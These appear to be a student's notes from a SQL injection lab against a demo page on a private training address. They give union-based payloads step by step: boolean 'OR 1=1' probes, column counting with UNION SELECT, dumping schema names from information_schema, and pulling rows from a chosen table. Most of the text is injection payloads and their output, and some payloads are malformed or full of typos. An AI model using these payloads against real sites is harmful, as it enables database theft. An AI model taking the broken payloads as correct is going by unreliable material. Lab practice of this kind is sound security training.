
'UNION SELECT table_schema,2,table_name,column_name,5 from information_schema.columns # 

1 :: find the volunerable field 

original feild // webserver
http://10.50.33.78/Union.html

a drop down box with a submit option click submit 
http://10.50.33.78/uniondemo.php?Selection=1&Submit=Submit

time to start testing fields 
http://10.50.33.78/uniondemo.php?Selection=1 OR 1=1
http://10.50.33.78/uniondemo.php?Selection=2 OR 1=1
http://10.50.33.78/uniondemo.php?Selection=3 OR 1=1
http://10.50.33.78/uniondemo.php?Selection=3 OR 1=1

  http://10.50.33.78/uniondemo.php?Selection=3
  test every avaiable option 
  gotta put in the question mark 
    http://10.50.33.78/uniondemo.php?Selection=3 OR 2 1=1
  
-------------------------------------------------------------------------------
 
2 :: identify # of columns 
  
http://10.50.33.78/uniondemo.php?Selection=3 UNION SELECT 1,2,3
  Manufacturer	Cost	Tire Size
  Copper 	275 	16
  1 	3 	2
 ------------------------------------------------------------------------------

3 :: modify golden to dump the database 
  
 
    
     Audi'UNION SELECT table_schema,table_name,column_name, from information_schema.columns # 


-------------------------------------------------------------------------------------------

4 :: modify golden to query the feilds / data you want

  still have to include the number of fields the table requires 
  still has a field that doesnt display so you cant ask for info (2) 
  columns and tables are case sensitive 

  HOW DO I VIEW JUST SESSION 
  
    Audi'UNION SELECT tireid,2,name,size,cost FROM session.Tires #
    
